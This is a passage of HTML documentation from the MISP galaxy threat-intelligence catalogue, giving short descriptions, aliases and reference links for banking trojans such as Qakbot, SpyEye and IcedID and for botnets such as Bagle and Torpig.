<p>Ramnit is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Nimnul</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 444. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/">https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qakbot"><a class="anchor" href="#_qakbot"></a><a class="link" href="#_qakbot">Qakbot</a></h3>
<div class="paragraph">
<p>Qakbot is a banking trojan that leverages webinjects to steal banking information from victims. It also utilizes DGA for command and control. It is primarily delivered via exploit kits.</p>
</div>
<div class="paragraph">
<p>Qakbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Qbot</p>
</li>
<li>
<p>Pinkslipbot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 445. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/">https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/">https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf">https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_corebot"><a class="anchor" href="#_corebot"></a><a class="link" href="#_corebot">Corebot</a></h3>
<div class="paragraph">
<p>Corebot is a modular trojan that leverages a banking module that can perform browser hooking, form grabbing, MitM, webinjection to steal financial information from victims. Distributed primarily via malspam emails and exploit kits.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 446. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/an-overnight-sensation-corebot-returns-as-a-full-fledged-financial-malware/">https://securityintelligence.com/an-overnight-sensation-corebot-returns-as-a-full-fledged-financial-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf">https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/">https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinynuke"><a class="anchor" href="#_tinynuke"></a><a class="link" href="#_tinynuke">TinyNuke</a></h3>
<div class="paragraph">
<p>TinyNuke is a modular banking trojan that includes a HiddenDesktop/VNC server and reverse SOCKS 4 server. It&#8217;s main functionality is to make web injections into specific pages to steal user data. Distributed primarily via malspam emails and exploit kits.</p>
</div>
<div class="paragraph">
<p>TinyNuke is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NukeBot</p>
</li>
<li>
<p>Nuclear Bot</p>
</li>
<li>
<p>MicroBankingTrojan</p>
</li>
<li>
<p>Xbot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 447. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/">https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/">https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/">https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=4596">http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=4596</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://benkowlab.blogspot.ca/2017/08/quick-look-at-another-alina-fork-xbot.html">https://benkowlab.blogspot.ca/2017/08/quick-look-at-another-alina-fork-xbot.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_retefe"><a class="anchor" href="#_retefe"></a><a class="link" href="#_retefe">Retefe</a></h3>
<div class="paragraph">
<p>Retefe is a banking trojan that is distributed by what SWITCH CERT calls the Retefe gang or Operation Emmental. It uses geolocation based targeting. It also leverages fake root certificate and changes the DNS server for domain name resolution in order to display fake banking websites to victims. It is spread primarily through malspam emails.</p>
</div>
<div class="paragraph">
<p>Retefe is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tsukuba</p>
</li>
<li>
<p>Werdlod</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 448. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.govcert.admin.ch/blog/33/the-retefe-saga">https://www.govcert.admin.ch/blog/33/the-retefe-saga</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/">https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/">https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityblog.switch.ch/2014/11/05/retefe-with-a-new-twist/">https://securityblog.switch.ch/2014/11/05/retefe-with-a-new-twist/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityintelligence.com/tsukuba-banking-trojan-phishing-in-japanese-waters/">http://securityintelligence.com/tsukuba-banking-trojan-phishing-in-japanese-waters/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reactorbot"><a class="anchor" href="#_reactorbot"></a><a class="link" href="#_reactorbot">ReactorBot</a></h3>
<div class="paragraph">
<p>ReactorBot is sometimes mistakenly tagged as Rovnix. ReactorBot is a full fledged modular bot that includes a banking module that has roots with the Carberp banking trojan. Distributed primarily via malspam emails.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 449. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html">http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under">https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html">http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/">http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_matrix_banker"><a class="anchor" href="#_matrix_banker"></a><a class="link" href="#_matrix_banker">Matrix Banker</a></h3>
<div class="paragraph">
<p>Matrix Banker is named accordingly because of the Matrix reference in it&#8217;s C2 panel. Distributed primarily via malspam emails.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 450. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/">https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeus_gameover"><a class="anchor" href="#_zeus_gameover"></a><a class="link" href="#_zeus_gameover">Zeus Gameover</a></h3>
<div class="paragraph">
<p>Zeus Gameover captures banking credentials from infected computers, then use those credentials to initiate or re-direct wire transfers to accounts overseas that are controlled by the criminals. GameOver has a decentralized, peer-to-peer command and control infrastructure rather than centralized points of origin. Distributed primarily via malspam emails and exploit kits.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 451. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://heimdalsecurity.com/blog/zeus-gameover/">https://heimdalsecurity.com/blog/zeus-gameover/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA14-150A">https://www.us-cert.gov/ncas/alerts/TA14-150A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spyeye"><a class="anchor" href="#_spyeye"></a><a class="link" href="#_spyeye">SpyEye</a></h3>
<div class="paragraph">
<p>SpyEye is a similar to the Zeus botnet banking trojan. It utilizes a web control panel for C2 and can perform form grabbing, autofill credit card modules, ftp grabber, pop3 grabber and HTTP basic access authorization grabber. It also contained a Kill Zeus feature which would remove any Zeus infections if SpyEye was on the system. Distributed primarily via exploit kits and malspam emails.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 452. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf">https://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html">https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot">https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_citadel"><a class="anchor" href="#_citadel"></a><a class="link" href="#_citadel">Citadel</a></h3>
<div class="paragraph">
<p>Citadel is an offspring of the Zeus banking trojan. Delivered primarily via exploit kits.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 453. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/">https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://krebsonsecurity.com/tag/citadel-trojan/">https://krebsonsecurity.com/tag/citadel-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/">https://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_atmos"><a class="anchor" href="#_atmos"></a><a class="link" href="#_atmos">Atmos</a></h3>
<div class="paragraph">
<p>Atmos is derived from the Citadel banking trojan. Delivered primarily via exploit kits and malspam emails.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 454. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/">https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.xylibox.com/2016/02/citadel-0011-atmos.html">http://www.xylibox.com/2016/02/citadel-0011-atmos.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ice_ix"><a class="anchor" href="#_ice_ix"></a><a class="link" href="#_ice_ix">Ice IX</a></h3>
<div class="paragraph">
<p>Ice IX is a bot created using the source code of ZeuS 2.0.8.9. No major improvements compared to ZeuS 2.0.8.9.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 455. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/ice-ix-not-cool-at-all/29111/" class="bare">https://securelist.com/ice-ix-not-cool-at-all/29111/</a> [<a href="https://securelist.com/ice-ix-not-cool-at-all/29111/" class="bare">https://securelist.com/ice-ix-not-cool-at-all/29111/</a> ]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zitmo"><a class="anchor" href="#_zitmo"></a><a class="link" href="#_zitmo">Zitmo</a></h3>
<div class="paragraph">
<p>Zeus in the mobile. Banking trojan developed for mobile devices such as Windows Mobile, Blackberry and Android.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 456. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/zeus-in-the-mobile-for-android-10/29258/">https://securelist.com/zeus-in-the-mobile-for-android-10/29258/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_licat"><a class="anchor" href="#_licat"></a><a class="link" href="#_licat">Licat</a></h3>
<div class="paragraph">
<p>Banking trojan based on Zeus V2. Murofet is a newer version of Licat found ~end of 2011</p>
</div>
<div class="paragraph">
<p>Licat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Murofet</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 457. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://johannesbader.ch/2015/09/three-variants-of-murofets-dga/">https://johannesbader.ch/2015/09/three-variants-of-murofets-dga/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_LICAT.A">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_LICAT.A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus%3aWin32%2fMurofet.A">https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus%3aWin32%2fMurofet.A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skynet"><a class="anchor" href="#_skynet"></a><a class="link" href="#_skynet">Skynet</a></h3>
<div class="paragraph">
<p>Skynet is a Tor-powered trojan with DDoS, Bitcoin mining and Banking capabilities. Spread via USENET as per rapid7.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 458. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/">https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_icedid"><a class="anchor" href="#_icedid"></a><a class="link" href="#_icedid">IcedID</a></h3>
<div class="paragraph">
<p>According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. are also on the target list the malware fetches.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 459. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-icedid-banking-trojan-discovered/">https://www.bleepingcomputer.com/news/security/new-icedid-banking-trojan-discovered/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/">https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gratefulpos"><a class="anchor" href="#_gratefulpos"></a><a class="link" href="#_gratefulpos">GratefulPOS</a></h3>
<div class="paragraph">
<p>GratefulPOS has the following functions
1. Access arbitrary processes on the target POS system
2. Scrape track 1 and 2 payment card data from the process(es)
3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 460. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season">https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dok"><a class="anchor" href="#_dok"></a><a class="link" href="#_dok">Dok</a></h3>
<div class="paragraph">
<p>A macOS banking trojan that that redirects an infected user&#8217;s web traffic in order to extract banking credentials.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 461. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#Dok">https://objective-see.com/blog/blog_0x25.html#Dok</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downandexec"><a class="anchor" href="#_downandexec"></a><a class="link" href="#_downandexec">downAndExec</a></h3>
<div class="paragraph">
<p>Services like Netflix use content delivery networks (CDNs) to maximize bandwidth usage as it gives users greater speed when viewing the content, as the server is close to them and is part of the Netflix CDN. This results in faster loading times for series and movies, wherever you are in the world. But, apparently, the CDNs are starting to become a new way of spreading malware. The attack chain is very extensive, and incorporates the execution of remote scripts (similar in some respects to the recent “fileless” banking malware trend), plus the use of CDNs for command and control (C&amp;C), and other standard techniques for the execution and protection of malware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 462. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/09/13/downandexec-banking-malware-cdns-brazil/">https://www.welivesecurity.com/2017/09/13/downandexec-banking-malware-cdns-brazil/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smominru"><a class="anchor" href="#_smominru"></a><a class="link" href="#_smominru">Smominru</a></h3>
<div class="paragraph">
<p>Since the end of May 2017, we have been monitoring a Monero miner that spreads using the EternalBlue Exploit (CVE-2017-0144). The miner itself, known as Smominru (aka Ismo) has been well-documented, so we will not discuss its post-infection behavior. However, the miners use of Windows Management Infrastructure is unusual among coin mining malware.
The speed at which mining operations conduct mathematical operations to unlock new units of cryptocurrency is referred to as “hash power”. Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz. The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week.</p>
</div>
<div class="paragraph">
<p>Smominru is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ismo</p>
</li>
<li>
<p>lsmo</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 463. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators">https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_botnet"><a class="anchor" href="#_botnet"></a><a class="link" href="#_botnet">Botnet</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>botnet galaxy.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Botnet is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/botnet.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_adb_miner"><a class="anchor" href="#_adb_miner"></a><a class="link" href="#_adb_miner">ADB.miner</a></h3>
<div class="paragraph">
<p>A new botnet appeared over the weekend, and it&#8217;s targeting Android devices by scanning for open debug ports so it can infect victims with malware that mines the Monero cryptocurrency.</p>
</div>
<div class="paragraph">
<p>The botnet came to life on Saturday, February 3, and is targeting port 5555, which on devices running the Android OS is the port used by the operating system&#8217;s native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system&#8217;s most sensitive features.</p>
</div>
<div class="paragraph">
<p>Only devices running the Android OS have been infected until now, such as smartphones, smart TVs, and TV top boxes, according to security researchers from Qihoo 360&#8217;s Network Security Research Lab [Netlab] division, the ones who discovered the botnet, which the named ADB.miner.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 464. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/android-devices-targeted-by-new-monero-mining-botnet/">https://www.bleepingcomputer.com/news/security/android-devices-targeted-by-new-monero-mining-botnet/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bagle"><a class="anchor" href="#_bagle"></a><a class="link" href="#_bagle">Bagle</a></h3>
<div class="paragraph">
<p>Bagle (also known as Beagle) was a mass-mailing computer worm affecting Microsoft Windows. The first strain, Bagle.A, did not propagate widely. A second variant, Bagle.B, was considerably more virulent.</p>
</div>
<div class="paragraph">
<p>Bagle is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Beagle</p>
</li>
<li>
<p>Mitglieder</p>
</li>
<li>
<p>Lodeight</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 465. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Bagle_(computer_worm)">https://en.wikipedia.org/wiki/Bagle_(computer_worm)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_marina_botnet"><a class="anchor" href="#_marina_botnet"></a><a class="link" href="#_marina_botnet">Marina Botnet</a></h3>
<div class="paragraph">
<p>Around the same time Bagle was sending spam messages all over the world, the Marina Botnet quickly made a name for itself. With over 6 million bots pumping out spam emails every single day, it became apparent these “hacker tools” could get out of hand very quickly. At its peak, Marina Botnet delivered 92 billion spam emails per day.</p>
</div>
<div class="paragraph">
<p>Marina Botnet is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Damon Briant</p>
</li>
<li>
<p>BOB.dc</p>
</li>
<li>
<p>Cotmonger</p>
</li>
<li>
<p>Hacktool.Spammer</p>
</li>
<li>
<p>Kraken</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 466. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Botnet">https://en.wikipedia.org/wiki/Botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_torpig"><a class="anchor" href="#_torpig"></a><a class="link" href="#_torpig">Torpig</a></h3>
<div class="paragraph">
<p>Torpig, also known as Anserin or Sinowal is a type of botnet spread through systems compromised by the Mebroot rootkit by a variety of trojan horses for the purpose of collecting sensitive personal and corporate data such as bank account and credit card information. It targets computers that use Microsoft Windows, recruiting a network of zombies for the botnet. Torpig circumvents antivirus software through the use of rootkit technology and scans the infected system for credentials, accounts and passwords as well as potentially allowing attackers full access to the computer. It is also purportedly capable of modifying data hajimeon the computer, and can perform man-in-the-browser attacks.</p>
</div>
<div class="paragraph">
<p>Torpig is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sinowal</p>
</li>
<li>
<p>Anserin</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 467. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Torpig">https://en.wikipedia.org/wiki/Torpig</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
